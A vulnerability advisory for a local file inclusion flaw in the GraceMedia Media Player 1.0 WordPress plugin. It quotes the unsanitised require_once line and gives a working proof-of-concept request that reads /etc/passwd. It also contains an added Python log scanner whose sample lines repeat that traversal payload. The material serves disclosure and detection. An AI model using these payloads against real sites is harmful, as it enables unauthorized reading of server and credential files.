"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion"

Author

"Manuel García Cárdenas"

Platform

php

Release date

2019-03-13

=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion

II. BACKGROUND
-------------------------
Hassle-free and user-friendly way to add a Media player directly to your
website.

III. DESCRIPTION
-------------------------
This bug was found in the file:

/gracemedia-media-player/templates/files/ajax_controller.php

Vulnerable code:

require_once($_GET['cfg']);

The "cfg" parameter is not sanitized, which allows local files to be
included.

Exploiting the vulnerability only requires using version 1.0 of the HTTP
protocol to interact with the application.

IV. PROOF OF CONCEPT
-------------------------
The following URL has been confirmed to be vulnerable to local file
inclusion.

Local File Inclusion POC:

GET /wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
GraceMedia Media Player <= 1.0

VII. SOLUTION
-------------------------
Disable the plugin until a fix is available; the vendor has not provided a
fix after 2 requests.
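
Added example, not part of the original advisory: while the plugin stays
installed without a fix, web server access logs can be checked for requests
that pass a traversal or absolute path in "cfg" to the vulnerable script.
The log lines, IP addresses and the benign value player.cfg are constructed
for illustration; the Combined Log Format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path and parameter name come from the advisory.
VULN_SCRIPT = "gracemedia-media-player/templates/files/ajax_controller.php"
PARAM = "cfg"
# Request field of a Combined Log Format line (assumed): "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e) with `rounds` decode passes."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_cfg(value):
    """Return why a cfg value is suspicious, or None for a plain file name."""
    path = fully_decode(value).replace("\\", "/")
    if ".." in path.split("/"):
        return "directory traversal"
    if path.startswith("/"):
        return "absolute path"
    return None

def scan(lines):
    """Return (line_no, reason, decoded_cfg) for hits on the vulnerable script."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not fully_decode(target.path).endswith(VULN_SCRIPT):
            continue
        for value in parse_qs(target.query).get(PARAM, []):
            reason = classify_cfg(value)
            if reason:
                hits.append((line_no, reason, fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
BASE = "/wordpress/wp-content/plugins/" + VULN_SCRIPT + "?ajaxAction=getIds&cfg="
SAMPLE_LOG = [
    f'192.0.2.10 - - [13/Mar/2019:10:00:01 +0000] "GET {BASE}../../../etc/passwd HTTP/1.0" 200 1532',
    f'192.0.2.11 - - [13/Mar/2019:10:00:05 +0000] "GET {BASE}%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    f'192.0.2.12 - - [13/Mar/2019:10:00:09 +0000] "GET {BASE}player.cfg HTTP/1.1" 200 87',
    '192.0.2.13 - - [13/Mar/2019:10:00:12 +0000] "GET /wordpress/index.php?cfg=../x HTTP/1.1" 200 5120',
]
```

Calling scan(SAMPLE_LOG) reports lines 1 and 2; a 200 status on a flagged
line means the request was served and the host should be reviewed.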

VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/gracemedia-media-player/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 06, 2019 1: Initial release
March 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
February 06, 2019 2: Email to vendor without response
February 21, 2019 3: Second email to vendor without response
March 13, 2019 4: Sent to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester